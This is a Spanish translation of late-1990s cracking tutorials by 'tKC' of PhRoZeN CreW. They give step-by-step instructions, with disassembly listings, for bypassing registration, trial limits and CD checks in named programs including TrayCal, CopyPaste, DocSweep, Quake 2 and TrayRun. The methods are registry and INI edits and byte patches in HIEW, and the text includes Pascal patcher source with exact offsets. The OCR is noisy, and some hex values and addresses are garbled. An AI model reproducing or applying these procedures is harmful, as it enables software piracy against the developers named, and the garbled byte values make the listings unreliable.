- W32Dasm 8.9 o supeior (www.expage.com/page/w32dasm) 


- Hacker's View 5.66 (E-mail: sen Osuslikov.kemerovo.su) 


- FAR 1.50b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/far150b.exe) Es realmente bueno! O Windows 
Commander 3.50 Beta 5 (http://www.ghisler.com) 


Contenidos: 


1) Como registrar TrayCal 1.0 usando el registro WIN. Url: http://www.spaeder.com 


2) Como registrar CopyPaste 1.20 Url: http//www.wz.com/scriptsoftware 


3) Como eliminar las pausas en Radio Destiny 0.2 Url: http://www.destiny- 
software.com/destiny 


4) Código fuente Pascal para Parches, por tKC/PC “98 


Parte 1: Registrar TrayCal 1.0 usando el registro WIN. 
- Paso 1.- Ejecuta TRAYCAL.EXE 


- Paso 2.- Veras el mensaje que dice que puedes ejecutar el programa 15 veces, para evaluarlo. 
Haz click en registrar y pon tu nombre y cualquier código. Boom Código de registro inválido. 


- Paso 3.- Sal del programa. 
- Paso 4.- Ejecuta WC, y ve al directorio de TRAYCAL. 
- Paso 5.- Copia TRAYCAL.EXE a TRAYCAL.W32 


- Paso 7.- Desensamblalo y haz click en STRING DATA REFERENCE, y busca la cadena 
“Sorry, invalid registration code.”. Recuerda el mensaje y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, y deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 


:0043FD3D A1E8194400 mov eax, dword ptr [004419E8] 


:0043FD42 E88DO2FFFF call 0042 FFD4 


- Paso 9.- Ok, busquemos que pasa si has introducido un código inválido. Pulsa AvPág 2 o 3 
veces hasta ver: 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


:0043FE3A 8B0DDC 194400 mov ecx, dword ptr [004419DC] 


:0043FE40 B201 mov dl, 01 

:0043FE42 A128D84300 mov eax, dword ptr [0043D828] 
:0043FE47 E8S80E1FFFF call 0043DFCC 

:0043FE4C A3FC274400 mov dword ptr [004427FC], eax 


:0043FE51 C605C819440001 mov byte ptr [004419C8], 01 


:0043FE58 A0C8194400 mov al, byte ptr [004419C8] 


:0043FES5D 50 push eax 


* Possible StringData Ref from Code Obj ->"EnhancedSystemDate" 


:0043FESE B920004400 mov ecx, 00440020 


* Possible StringData Ref from Code Obj ->"TrayCal" 


:0043FE63 8B15D8194400 mov edx, dword ptr [004419D8] 


:0043FE69 A1FC274400 mov eax, dword ptr [004427FC] 
:0043FE6E ESADESFFEF call 0043E420 
:0043FE73 6AO01 push 00000001 


* Possible StringData Ref from Code Obj ->"RegistrationStatus”" 


- Paso 10.- Interesante... ves “RegistrationStatus”? Let's run (Ejecuta) REGEDIT y hecha un 
vistazo a HKCU Software WSpaedenTrayCal: 


EnhancedSystemDate="0" 
RegistrationStatus="0" 
Qué quiere decir? Deberías saberlo! ] Ok, let“s modify them. Cambia “0” por “1” 


Nota: Debemos cambiar EnhancedSystemDate Key también, sino no funcionaría. Bien, pulsa FS 
para guardar los cambios. 


- Paso 11.- Ejecuta TRAYCAL.EXE. Haz click en TC con el botón derecho, y en ABOUT. 
Wow, esta regulándose ahora!! Fácil eh? 


- Paso 12.- Dde todas formas puedes exportar HKKCUWSoftwarelSpaederTrayCal a un fichero. 
Haz click en Export Registry File, guardala como TC.REG... Mira abajo: 


REGEDIT4 
[HKEY_CURRENT_USER Software paedenTrayCal] 


"RegistrationStatus"="1" 


n_n3qnm 


"EnhancedSystemDate"= 


- Paso 13.- Puedes pasar TC.REG a cualquiera o la próxima vez ejecutar REGEDIT TC.REG, 
lo que lo importará al fichero de registro.. 


Parte 2: Registrar CopyPaste 1.20 

- Paso 1.- Ejecuta CopyPaste.EXE. 

- Paso 2.- Pon cualquier password para registrarlo. Boom Password erróneo — no registrado. 
- Paso 3.- Bien. Sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de CopyPaste. 


- Paso 5.- Copia CopyPaste.EXE a CopyPaste.EXX (como backup) y copia CopyPaste.EXE a 
CopyPaste.W32 (para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y dessensambla CopyPaste.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y busca la 
cadena “Wrong password — no register...”. 


- Paso 8.- Cierra la ventana SDR, y deberías ver las líneas: 
* Referenced by a (U)jnconditional or (C)onditional Jump at Addresses: 


1:00403427(C), :00403438(C) 


:0040346F 8D442430 lea eax, dword ptr [esp+30] 


:00403473 68FF000000 push 000000éFF 


:00403478 50 push eax 


:00403479 8B0D1C664100 mov ecx, dword ptr [0041661C] 


* Possible Reference to String Resource ID=00014: "Wrong password - no reg.." 


- Paso 9.- Has visto los saltos a los que se hace refencia? (403427 y 403438) Bien, pulsa RePág 
hasta ver: 


- Paso 10.- Mira 00403427, es a donde se saltará cuando ha sido jodido. Let's see. Asegurate de 
que la barra verde esta en 00403427 7446 je 0040346F y verás la dirección de compensación bajo 
la pantalla, (E Offset 0O002827h). Es donde puedes hacer el parche para CopyPaste.EXE. 


- Paso 11.- Vuelve a WC, ejecuta HIEW COPYPA-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 2827. Deberías ver algo como: 


00002827: 7446 je  00000286F ---------- (1) 
00002829: 8D442410 lea eax,[esp][00010] 
0000282D: 50 push eax 

0000282E: E81D400000 call 000006850 ---------- Q) 
00002833: 83C404 add  esp,004 

00002836: 85C0 test eax,eax 

00002838: 7435 je  00000286F ---------- (6) 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 9090 y ve abajo hasta 7435 
(offset 2838), pon 9090, pulsa F9 para guardar los cambios y sal de HIEW. 


- Paso 13.- Ejecuta CopyPaster.EXE, funciona? Eeyaa lo has hecho!! 


Parte 3: Eliminar pausas en Radio Destiny 0.2 
- Paso 1.- Ejecuta RADIO.EXE 

- Paso 2.- Boom esta versión ha caducado. Sal del programa. 
- Paso 3.- Ejecuta WC, ve al directorio de RADIO. 


- Paso 4.- Copia RADIO.EXE a RADIO.EXX (como backup) y copia RADIO.EXE a 
RADIO.W32 (para usar con W32Dasm) 


- Paso 5.- Ejecuta W32Dasm y desensambla RADIO.W32. 


- Paso 6.- Una vez desensamblado haz click en STRING DATA REFERENCE, y busca la 
cadena “This version has expired.”. 


- Paso 7.- No salgas de W32Dasm. Ejecuta HIEW RADIO.EXE. Pulsa F4 para el modo HEX, 
y pulsa F7. Busca la cadena “This version has exp” Gotcha! Lo encuentra! Ahora que? Ok, 
localiza el offset 6A26 (mira sobre HIEW) 


- Paso 8.- Vuelve a W32Dasm, pulsa AvPág hasta ver la dirección de compensación 
“00006A26h” (mira abajo en W32Dasm) 


- Paso 9.- Wow, que tenemos? Tenemos esto: 
:0001.63A6 54686973207665727369 DB "This versi" 
:0001.63B0 6F6E2068617320657870 DB "on has exp" 
:0001.63BA 697265642E00 DB "ired.",0 


Pulsa RePág 3 o 4 veces. Cuando ves "BYTE xxxxh" ignoralo, luego, los saltos referenciados no 
funcionarán! 


- Paso 10.- Hmm, que ves? Call USER MESSAGEBOX!! 


:0001.630A 9AC75B0000 call USER.IMESSAGEBOX 


Así que sabemos que llama a la caja de mensaje cuando ha caducado. 


Pulsa RePág hasta ver: 


:0001.62F1 7C21 316314 
:0001.62F3 7F05 jg 62FA 
:0001.62F5 3DB40B cmp ax, OBB4 
:0001.62F8 761A jbe 6314 


- Paso 11.- Mira a 0001.62Fl, es a donde se saltará cuando ha sido jodido. Let's see. Asegurate 
de que la barra verde esta en la dirección 0001.62F1 y verás la dirección de compensación bajo la 
pantalla, (O Offset 00006971h). Es donde puedes hacer el parche de RADIO.EXE. 


- Paso 12.- Vuelve a WC, ejecuta HIEW RADIO.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 6971. Deberías ver algo como: 


00006971: 7C21 jl. 000006994 

00006973: 7FOS jg  00000697A 
00006975: 3DB40B cmp  ax,00BB4 
00006978: 761A jbe 000006994 


- Paso 13.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los 
cambios y sal de HIEW. 


- Paso 14.- Ok, ejecuta RADIO.EXE boom Funciona! J 


Parte 4: Código fuente Pascal para parches, por tKC/PC “98 


Uses Crt; 
Const A: Array[1..4] of Record (<-------- 4 bytes to be patched]) 

A : Longint; 

B : Byte; 

End = 
((A:$2827;B:$90), [ <--========="- offset "2827" and byte "90" to be changed) 
(A:$2828;B:$90), [ <----==-=-======-- offset "2828" and byte "90" to be changed) 
(A:$2838;B:$90), [ <----==-===-==--- offset "2838" and byte "90" to be changed) 
(A:$2839;B:$90)); [ <-=-=-===-======-- offset "2839" and byte "90" to be changed) 


Var Ch:Char; 


I:Byte; 
F:File; 


FN:file of byte; 


Size:longint; 


Begin 
Writeln(Little Patch”); writeln(Crack for CopyPaste 1.20 by tKC/PC "98”); 
Assign(F,COPYPA-1.EXE"); [<= ------- filename to be patched) 
[SI-) Reset(F, 1); (SI+-) 
If TOResult <> O then 
begin 
writeln('File not found!”); 
halt(); 
end; 
For l:=1 to 4 do [<= -=------- 4 bytes to be patched]) 
Begin 


Seek(F,A[I].A); 


Ch:=Char(A[IT].B); 
Blockwrite(F,Ch, 1); 
End; 


Writeln('File successfully patched!'); 


End. 


Ok, suficiente por hoy. Espero que te hayas divertido con este tutorial más de lo que yo lo hice! J 


Te vere la próxima vez en el tutorial +6! 


Agradecimientos a Taha, Taylor, ThatDude, Archimede, PowerLord y todo el mundo en P.C.!! 


Este tutorial esta dedicado a Taha... como siempre... 


Puedes encontrarme en *pc98 o mandame un email a tkc O goplay.com(escribe en inglés) 


Que te diviertas!! 


The Keyboard Caper 


El fundador de PhRoZeN CreW “94 - “98 


4-1-1998 


tKKC CRACKING TUTOR, LECCIÓN 6 


Hi ya! 
Phew, mucho sin tutorial! 
Más abejas cough.. 


En este tutorial te enseñaré todo sobre W32Dasm. Discúlpame, nada sobre Softlce o IDA 
todavía, devido al corto tiempo (damn coding en Delphi 3). Pero tengo una nueva máquina 
superPC!! 


En el próximo tutorial rabiaremos sobre Softlce. J 
Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! ] 
Contenido: 
1) Como registrar DocSweep 3.0 
Usando el registro WIN sin parchear el programa. 


URL: http://www.spaeder.com 


2) Como registrar Cover Your Tracks 2.0 


Usando el fichero INI sin parchear el programa. 


URL: http://www.geocities.com/SiliconValley/Vista/5610/ 


3) Como crackear la comprobación de CD en Quake 2 3.10 


Parchear tu juego para que puedas jugar sin tu CD. 


URL: http://www.idsoftware.com 


4) Como registrar TrayRun 2.0.2 


Parchear un programa para aceptar tu regcode pero seguir desregistrado despues de reiniciar 
tu programa y como componerlo. La mayor parte de los programas shareware usan este 
esquema de registro. 


URL: http://www.mjnet.com 


S) Código fuente Pascal para parchear, por tKKC/PC “98 


Necesitaras Turbo Pascal 7.0 para compilar esta fuente. 


6) Mis últimas palabras. 


Herramientas: 


Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


W32Dasm 8.9: http://www .fortunecity.com/bally/waterford/18/w32dasm89.zip 


Hacker”s View 5.66: ftp://ftp.cdrom.com/.27/sac/utilprog/hiewS66.zip 


Far 1.50b: ftp://rwntug.quarta.msk.ru/WinUtil/Rar/Far150b.exe 
Windows Commander 3.50 Beta 7: http://www.ghisler.com 
O pregunta a cualquier cracker por estas herramientas, ellos estarán contentos por servirte! 


A próposito: Puedes encontrar otras herramientas como Softlce 3.22, IDA 3.70 y otros programas 
en: http://cracking.home.ml.org 


No me digas que no tienes estas herramientas para el próximo tutorial! J 
Parte 1: Como registrar DocSweep 3.0 


- Paso 1.- Ejecuta DOCSWEEP.EXE 


- Paso 2.- Verás el mensaje que te dice que te quedan 30 días para probar el programa. Haz clic 
con el botón derecho en DS, y haz click en REG NUMBER. Pon tu nombre y cualquier código. 
Boom. Código inválido. 


- Paso 3.- Ok, Sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de DocSweep. 

- Paso 5.- Copia DOCSWEEP.EXE a DOCSWEEP.W32 

- Paso 6.- Ejecuta W32Dasm y desensambla DOCSWEEP.W32 


- Paso 7.- Una vez desensamblado, haz clic en STRING DATA REFERENCE, y escribe: 
“Invalid registration code”. (Recuerda aquel mensaje de error), y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Invalid registration code.” <---- bad boy 


:0043578D A138784300 mov eax, dword ptr [00437838] 


:00435792 E89952FFFF call 0042 AA30 


- Paso 9.- Ok, vamos a ver que ocurre cuando introduces un código incorrecto. Pulsa RePág 
una o dos veces, hasta ver: 


:004356E1 0F859B000000 jne 00435782 <---- if invalid code, goto bad boy 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


:004356E7 8B0D34784300 mov ecx, dword ptr [00437834] 


:004356ED B201 mov dl, 01 

:004356EF B86C394300 mov eax, 0043396C 
:004356F4 ESCFESFFFF call 00433FC8 

:004356F9 A398864300 mov dword ptr [00438698], eax 


:004356FE C6059C86430001 mov byte ptr [0043869C], 01 <---- good boy 
:00435705 A09C864300 mov al, byte ptr [0043869C] 


:0043570A 50 push eax 


* Possible StringData Ref from Code Obj ->"Enhanced Hard Drive" 


- Paso 10.- Interesante... has visto lo que yo veo?? Ejecuta REGEDIT y hecha un vistazo a 
HKCUWSoftwarelSpaederilDocSweep: 


SectorsPerPartition="178" <---- Ejecuciones de evaluación restantes. 


Hmm, ok, vamos a añadir una nueva cadena llave. Debería ser algo como: 


Enhanced Hard Drive="1" 


SectorsPerPartition="178" 


- Paso 11.- Ejecuta DocSweep.exe, haz click con el botón derecho en DS, y haz click en About. 
Wow, esta registrado ahora!! Fácil eh? 


- Paso 12.- Hay otra forma de registrar DocSweep. Ahora quieres introducir cualquier código, 
no? Cambia “1” por “0” en Enhanced Hard Drive Key, y cambia JNE por JE en la dirección 
4356El1. Ejecuta DS pon tu nombre y cualquier código. Boom registrado! 


Parte 2: Como registrar Cover Your Tracks 2.0 
- Paso 1.- Ejecuta CYT.EXE 


- Paso 2.- Ahora ves el NAG que dice que te registres. Haz click en Register y pon tu nombre y 
cualquier código. 


- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de CY'T. 

- Paso 5.- Copia CYT.EXE a CYT.W32 

- Paso 6.- Ejecuta W32Dasm y desensambla CY T.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Invalid code”. Himm, no hay cadenas, ahora que? Ok, intentemos buscar la cadena “Registered” 


Haz doble click en el. 


Paso 8.- Cierra la ventana SDR, y deberías ver la línea: 
* Possible StringData Ref from Code Obj ->"Registered” <---- good boy 
:0043E7A1 BA6CE84300 mov edx, 0043E86C 
:0043E7A6 E841E6FDFF call 0041 CDEC 
Paso 9.- Ok, vamos a buscar que hace. Pulsa RePág una o dos veces hasta ver: 
* Possible StringData Ref from Code Obj ->"C:1windowsIsystemisystem.cyt" 


:0043E743 BA34E84300 mov edx, 0043E834 


:0043E748 8B08 mov ecx, dword ptr [eax] 


* Possible StringData Ref from Code Obj ->"true" <---- good boy 


:0043E769 BA5CE84300 mov edx, 0043E85C 
:0043E76E E85153FCFF call 00403AC4 
:0043E773 7418 


je 0043E78D <---- if not goto bad boy 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0043E773(C) 


:0043E78D C605EC27440001 mov byte ptr [004427EC], 01 


:0043E794 A1001C4400 mov eax, dword ptr [00441C00] 
:0043E799 8B00 mov eax, dword ptr [eax] 
:0043E79B 8B8020020000 mov eax, dword ptr [eax+00000220] 


* Possible StringData Ref from Code Obj ->"Registered” <---- good boy 


- Paso 10.- Interesante... ves lo que yo veo?? Que es eso de “CXAWindowsIsystemisystem.cyt”? 
Busca este fichero, y encontramos: 


false 


- Paso 11.- Hmm, vamos a probar a cambiar “false” por “true”. Graba los cambios y ejecuta 
CYT.EXE. Wow, esta registrado!! Es una de las protecciones más estupidas que he visto. 


Parte 3: Como crackear la comprobación de CD en Quake 2 3.10 


- Paso 1.- Ejecuta QUAKE2.EXE. 


- Paso 2.- Veras el mensaje que te dice que insertes tu CD para jugar. Ok, no problem, apunta 
el mensaje de error. (“You must have the Quake2 CD in the drive to play”) 


- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta Windows Commander, ve al directorio de Quake2. 

- Paso 5.- Copia QUAKE2.EXE a QUAKE2.EXX, y copia QUAKE2.EXE a QUAKE2.W32. 
- Paso 6.- Ejecuta W32Dasm y desensambla QUAKE2.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Y ou must have the Quake2 CD in...” (Recuerda este mensaje) y haz doble click en el. 


- Paso 8.. Cierra la ventana SDR, y deberías ver la línea: 


* Referenced by a CALL at Address: 00429038 <---- qué es eso? 


:0042D4F0 E83BFFFFFF call 0042D430 
:0042D4F5 803800 cmp byte ptr [eax], 00 
:0042D4F8 750F jne 0042D509 <---- bad boy 


* Possible StringData Ref from Data Obj ->"You must have the Quake2 CD in " 
->"the drive to play." 


- Paso 9.- Ok, vamos a buscar que llamada se produce. Hmm, ves lo que yo veo? Mira arriba, a 
la referencia por una llamada en 429038. Haz click en el botón Goto Code Location, y pon 
429038. 


- Paso 10.- Interesante... que hemos conseguido? Aquí esta lo que tenemos: 


:00429034 85C0 test eax, eax 


:00429036 7505 jne 0042903D <---- 1f not, jump to good boy 


:00429038 E8B 3440000 call 0042D4F0 <---- bad boy! 


* Referenced by a (U)jnconditional or (C)onditional Jump at Addresses: 


[:00428FE5(U), :00428FFS(C), :00429019(U), :00429036(C) 


:0042903D E84E710000 call 00430190 <---- good boy! 


- Paso 11.- Ok, vamos a cambiar 75 por EB en la dirección 429036. Asegurate de que la barra 
verde esta en 00429036 7505 ¡ne 0042903D y deberías ver la dirección debajo de la pantalla, 
algo como Offset 00028436h. Es donde puedes hacer el parche para QUAKE2.EXE. 


- Paso 12.- Vuelve a WC, ejecuta HIEW QUAKE2.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 28436. Deberías ver algo como: 


00028436: 7505 jne 00002843D —---------- (1) 
00028438: ESB3440000 call 00002C8F0 ---------- (2) 
0002843D: Es4E710000 call 00002F590 ---------- (3) 
00028442: 8B0DEC0F4700 mov  ecx,[000470FEC] 
00028448: A388104700 mov  [000471088],eax 


- Paso 13.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar los 
cambios y sal de HIEW. 


- Paso 14.- Ejecuta QUAKE2.EXE, funciona? Eeyaaa Lo has hecho!! 


Parte 4: Como registrar TrayRun 2.0.1 
- Paso 1.- Ejecuta TRAYRUN.EXE. 


- Paso 2..- Haz click en Register, pon tu nombre y cualquier código y... boom Registración 
inválida. 


- Paso 3.- Ok, sal del programa. 
- Paso 4.- Ejecuta WC, y ve al directorio de TRAYRUN. 


- Paso 5.- Copia TRAYRUN.EXE a TRAYRUN.EXX, y copia TRAYRUN.EXE a 
TRAYRUN.W32. 


- Paso 6.- Ejecuta W32Dasm y desensambla TRAYRUN.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Registration failed”. (Recuerda el mensaje) y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, y deberías ver las líneas: 


* Possible StringData Ref from Code Obj ->"RegC" <---- and this? 


:0042E6C0 BAACE74200 mov edx, 0042E7AC 


:0042E6C5 8BC6 mov eax, esl 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E64C(C) 


* Possible StringData Ref from Code Obj ->"Registration Failed.” <---- bad boy 


:0042E6F6 B8BCE74200 mov eax, 0042E7BC 


- Paso 9.- Ves lo que yo veo? Referenced jump! Ok, vamos a hacer click en Goto Code 
Location y pon 42E652C y encontrarás: 


:0042E64C 0F85A4000000 jne 0042E6F6 <---- if not, jump to bad boy 


* Possible StringData Ref from Code Obj ->"Registration Succesful.” <---- good 
boy 


:0042E652 B848E74200 mov eax, 0042E748 


- Paso 10.- Kew!l... Let's play! Asegurate de que la barra verde esta en 0042E64C 
0F85A400000 y verás la dirección de compensación bajo la pantalla, (Offset 0O02DA4Ch). Es 
donde puedes hacer el parche para TRAYRUN.EXE. 


- Paso 11..- Vuelve a WC, ejecuta HIEW TRAYRUN.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, pon 2DA4C y deberías ver lo siguiente: 


0002DA4C: 0F85A4000000 jne 00002DAF6 ---------- (2) 
0002DA52: B348E74200 mov  eax,00042E748 
0002DA57: ES7CBBFFFF call 0000295D8  ---------- (3) 


0002DA3C: B201 mov  dl,001 


0002DAS5E: B870304200 mov  eax,000423070 
0002DA63: ESBC4AFFFF call 000022524 =--------- (4) 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 0F84, pulsa F9 para grabar los 
cambios, y sal de HIEW. 


- Paso 13.- Ejecuta TRAYRUN.EXE. Pon tu nombre y cualquier código, ahora dice que esta 
registrado, no? Haz click en About y veras tu nombre, kew!l... 


- Paso 14.- Ahora sal de TrayRun ejecutalo otra vez. Hmm, todavía no esta registrado? Ahora 
que? NO necesitas mearte los calzoncillos! El programa comprueba tu nombre en el registro WIN 
si es válido! Ellos estan almacenados en HKCYSoftwarelKJTNET TrayRun Settings. 


- Paso 15.- Vuelve a W32Dasm y abre la ventana SDR, y escribe “RegC”. (Recuerdas donde 
has estado antes?) Lo has visto en la dirección 42E6C0 antes de que arreglaramos la 1* parte. 
Ahora haz doble click en “RegC”. 


- Paso 16.- Cierra la ventana SDR, deberías ver las líneas: 


* Possible StringData Ref from Code Obj ->"RegC" 


:004309EC BA9C0B4300 mov edx, 00430B9C 


:004309F1 8BC3 mov eax, ebx 


:00430A0C 833DD426430000 cmp dword ptr [004326D4], 00000000 <---- 
regcode! 


:00430A 13 750D jne 00430422 


:00430A 15 833DD826430000 cmp dword ptr [004326D3], 00000000 


:00430A1C 0F84E0000000 je 00430B02 <---- if not, jump to bad boy 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:00430A13(C) 


:00430A22 A194264300 mov eax, dword ptr [00432694] 


- Paso 17.- Ahora hecharas un buen vistazo. Hmm, 430B02, esta demasiado lejos del salto 
desde 430A1C, piensas que saltará muy lejos si eres un buen chico? Yo no pienso así. Mira a la 
dirección 430B02: 


:00430B02 A1A0264300 mov eax, dword ptr [004326A0] 
:00430B07 ES6C04FFFF call 00420F78 
:00430B26 E8C928FDFF call 004033F4 


- Como ves 430B02 esta cerca de 430B2B (lo que quiere decir que vuelve antes de que la 
llamada se produzca) Así que no puede ser que salte, así que normalmente tengo que hacer esto, 
encontrar la última comparación antes del comando RET. 


- Paso 18.- Ahora tenemos que apuntar y buscar: 


:00430ADC 740C je 00430AEA <---- 1f kewl, jump to good boy 


:00430ADE A1A0264300 mov eax, dword ptr [004326A0] 
:00430AE3 EsS9004FFFF call 00420F78 


:00430AE8 EB22 jmp 00430B0C <---- jump to bad boy (final part) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


[:00430ADC(C) 

:00430AEA A19C264300 mov eax, dword ptr [0043269C] 

:00430AEF 8B80E0010000 mov eax, dword ptr [eax+000001E0] 
:00430AF5 8B15D4264300 mov edx, dword ptr [004326D4] <---- regcode! 


Así que sabremos que tenemos que arreglar la dirección 4W30ADC! Asegurate de que la barra 
verde esta en 00430ADC 740C, con lo que verás la dirección de compensación (O Offset 
0002FEDCh). Es donde puedes hacer el parche para TRAYRUN.EXE. 


- Paso 19.- Vuelve a WC, ejecuta HIEW TRAYRUN.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, pon 2FEDC, y deberías ver algo como: 


0002FEDC: 740C je 00002FEEA ---------- (1) 
0002FEDE: A1A0264300 mov  eax,[0004326A0] 

0002FEE3: ES9004FFFF call 000020378 ---------- 0) 
0002FEE8: EB22 jmps O0002FFOC ---------- (3) 


0002FEEA: A19C264300 mov  eax,[00043269C] 


Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los cambios y sal 
de HIEW. 


- Paso 20.- Ahora ejecuta TRAYRUN.EXE... No NAG so far, ahora haz click en about. Wow, 
esta registrado! 


Parte 5: Código fuente Pascal para parches, por tKC/PC “98 


Uses Crt; 


Const A: Array[1..1] of Record (<-------- 1 bytes to be patched] 
A : Longint; 
B : Byte; 
End = 


((A:$28436;B:$EB)); ([<--------------- offset "28436" and byte "EB" to be changed) 


Var Ch:Char; 
I:Byte; 
F:File; 


EN:file of byte; 


Size:longint; 


Begin 


Writeln(Little Patch');writeln(Crack for Quake 2 3.10 by tKC/PC "98"; 
Assign(F,QUAKE2.EXE”); ( <=---=--=------ filename to be patched) 
[SI-) Reset(F, 1); (SI+-) 
If IOResult <> O then 
begin 
writeln('File not found!”); 
halt(1); 
end; 
For I:=1 to 1 d0 [<a 4 bytes to be patched]) 
Begin 
Seek(F,A[I].A); 
Ch:=Char(A[I].B); 
Blockwrite(F,Ch, 1); 


End; 


Writeln('File successfully patched!'); 


End. 


Últimas palabras: 


Espero que te hayas divertido con este tutorial mucho más de lo que yo lo hize! J 


Te veré la próxima vez en el tutorial +7. 


Agradecimientos a Celeste, Hanna, Kandi, Lizel, Taha, PowerLord y a todo el mundo en el canal 
PC98! 


Este tutorial esta dedicado a Celeste... pretty woman. 


Puedes encontrarme en 4+PC98 o mandame un email a tkcO goplay.com 


Que te diviertas!, 
The Keyboard Caper, 
El Fundador de PhRoZeN CreW “94-98 


2-2-1998 


tKC CRACKING TUTOR, LECCIÓN 7 


Bienvenido al tutorial del cracker +7! 


Phew, muchas abejas me han preguntado si iba a continuar escribiendo tutoriales. Así que tu 


estas mirando a esta nueva versión de Windows! Espero que te guste este kewl proggie! J Más 
abejas... cought 


Peligro! Este tutorial es realmente una madre!! Sonrisa 


En este tutorial te enseñaré todo sobre W32Dasm y Softlce. Gracias a Dios por un nuevo 
superPC! 


Ok, let's rave!! 


Contenidos: 


1) Como eliminar la comprobación de CD en Balls of Steel 1.1 usando W32Dasm 


URL: http://www.pinfllwizards.com/bosdownload.htm 


2) Como eliminar el NAG y el límite de 30 días en NeverForget 1.00 , usando W32Dasm 


URL: http://www.neverforget.com/trial.html 


3) Como registrarse en Phone Plus 2.00, usando Softlce 


URL: http://www.aros.net/-impulse 


4) Como registrarse en WinPatch 1.0.06, usando Softlce 


URL: http://www.artistry.com/products/winpatch/wp.exe 


5) Sumario 


6) Mis últimas palabras 


Herramientas: 


Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


W32Dasm 8.9: http://www .fortunecity.com/bally/waterford/18/w32dasm809.zip 


Hacker”s View 5.66: ftp://ftp.cdrom.com/.27/sac/utilprog/hiewS66.zip 


Far 1.50b: ftp://rwntug.quarta.msk.ru/WinUtil/Rar/Far150b.exe 


Windows Commander 3.50 Beta 7: http://www.ghisler.com 


O pregunta a cualquier cracker por estas herramientas, ellos estarán contentos por servirte! 


A próposito: Puedes encontrar otras herramientas como Softlce 3.22, IDA 3.70 y otros programas 
en: http://cracking.home.ml.org 


Asegurate de tener estas herramientas para el próximo tutorial!! 


Parte 1: Como eliminar la comprobación de CD en Balls of Steel 1.1 


- Paso 1.- Ejecuta BOS.EXE 


- Paso 2.- Veras el mensaje que dice que debes insertar el CD para jugar. Ok, no problem, 
apunta el mensaje. (“Please inset tha Balls of Steel CD and click...”) 


- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de BOS. 

- Paso 5.- Copia BOS.EXE a BOS.EXX, y copia BOS.EXE a BOS.W32. 
- Paso 6.- Ejecuta W32Dasm y desensambla BOS.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE y escribe: 
“Please insert the Balls of Steel...” (Recuerda este mensaje) y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, y de verías ver la línea: 
:00439882 B9F4984300 mov ecx, 004398F4 
* Possible StringData Ref from Code Obj ->"Please insert the Balls of Steel " 


- Paso 9.- Ok, vamos a ver que llamadas realiza este procedimiento. Hmm, debemos volver al 
principio de este procedimiento. 


- Paso 10.- Pulsa RePág 2 o 3 veces y encontramos: 


- Paso 11.- Ok, vamos a ver que llamadas realiza este procedimiento. Mira arriba, la referencia 
a la llamada en 4399D3. 


- Paso 12.- Ah! Encontramos la llamada aquí: 
:004399D5 ESCAFDFFFF call 004397A4 


- Paso 13.- Hmm, vamos a ver que pasa con esta llamada. Asegurate de que la barra verde esta 
en 004399D5 ESCAFDFFFF call 004397A4 y verás la dirección de compensación bajo la 
pantalla, (O Offset 00038DD5h). Es donde puedes hacer el parche para BOS.EXE. 


- Paso 14.- Vuelve a WC, ejecuta HIEW BOS.EXE, pulsa F4 para seleccionar modo 


descodificador (ASM), pulsa FS y pon 38DDS. Deberías ver lo siguiente: 


00038DD5: ESCAFDFFFF call 000038BA4  ---------- dd) 
00038DDA: ESD1FBFFFF call 0000389B0 ---------- Q) 
00038DDF: 8BOB mov  ecx,[ebx] 
00038DD5: ESCAFDFFFF call 000038BA4  ---------- d) 
00038DDA: ESD1FBFFFF call 0000389B0 ---------- Q) 
00038DDF: 8BOB mov  ecx,[ebx] 


- Paso 15.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 9090909090, pulsa F9 para 
guardar los cambios y sal de HIEW. 


- Paso 16.- Ejecuta BOS.EXE, funciona? Heeyaa Lo has hecho!! 


Parte 2: Como eliminar el NAG y el límite de 30 días en NeverForget 
1.00 


- Paso 1.- Ejecuta NeverForget.exe 


- Paso 2.- Veras ese NAG, muy irritante, no? Ok, no problem, apunta el mensaje. (“Demo 
version 1.00 installed on...”) 


- Paso 3.- Ok, sal del programa. 
